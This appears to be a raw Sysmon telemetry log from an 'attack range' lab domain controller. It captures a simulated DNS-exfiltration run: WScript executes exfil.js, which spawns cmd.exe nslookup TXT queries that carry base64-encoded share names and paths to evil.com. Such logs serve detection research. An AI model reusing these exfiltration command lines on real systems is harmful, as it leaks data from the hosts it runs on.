14:16:26.503{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198987Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.503{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198986Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.503{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198985Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.503{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198984Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.503{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17BA-629A-DD3F-000000005F02}2872C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000198983Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.503{2E1864BB-17BA-629A-DB3F-000000005F02}6605584C:\Windows\system32\cmd.exe{2E1864BB-17BA-629A-DD3F-000000005F02}2872C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000198982Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.513{2E1864BB-17BA-629A-DD3F-000000005F02}2872C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlw= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17BA-629A-DB3F-000000005F02}660C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlw= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlbuc.tmp 2>&1 10341000x8000000000000000198981Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.481{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17BA-629A-DC3F-000000005F02}3212C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198980Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.481{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17BA-629A-DC3F-000000005F02}3212C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198979Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.481{2E1864BB-17BA-629A-DC3F-000000005F02}32124812C:\Windows\system32\conhost.exe{2E1864BB-17BA-629A-DB3F-000000005F02}660C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198978Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.466{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17BA-629A-DC3F-000000005F02}3212C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000198977Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.466{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198976Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.466{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198975Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.466{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198974Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.466{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198973Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.466{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17BA-629A-DB3F-000000005F02}660C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000198972Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.466{2E1864BB-17A1-629A-783D-000000005F02}55525608C:\Windows\System32\WScript.exe{2E1864BB-17BA-629A-DB3F-000000005F02}660C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000198971Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.472{2E1864BB-17BA-629A-DB3F-000000005F02}660C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlw= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlbuc.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000198970Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.466{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlbaov.tmpMD5=F6538327F98D74144BA52EAB59FD8171,SHA256=A568CE5C7493269BCFA80FC109B1A109EB505115BC218515B0E503F4B1DBE007,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000198969Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.434{2E1864BB-17BA-629A-D93F-000000005F02}14922040C:\Windows\system32\conhost.exe{2E1864BB-17BA-629A-DA3F-000000005F02}2620C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198968Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.419{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198967Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.419{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198966Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.419{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198965Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.419{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198964Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.419{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17BA-629A-DA3F-000000005F02}2620C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000198963Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.419{2E1864BB-17BA-629A-D83F-000000005F02}74765392C:\Windows\system32\cmd.exe{2E1864BB-17BA-629A-DA3F-000000005F02}2620C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000198962Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.432{2E1864BB-17BA-629A-DA3F-000000005F02}2620C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBDJA== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17BA-629A-D83F-000000005F02}7476C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBDJA== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlbaov.tmp 2>&1 10341000x8000000000000000198961Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.403{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17BA-629A-D93F-000000005F02}1492C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198960Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.403{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17BA-629A-D93F-000000005F02}1492C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198959Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.403{2E1864BB-17BA-629A-D93F-000000005F02}14922040C:\Windows\system32\conhost.exe{2E1864BB-17BA-629A-D83F-000000005F02}7476C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198958Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.381{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17BA-629A-D93F-000000005F02}1492C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000198957Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.381{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 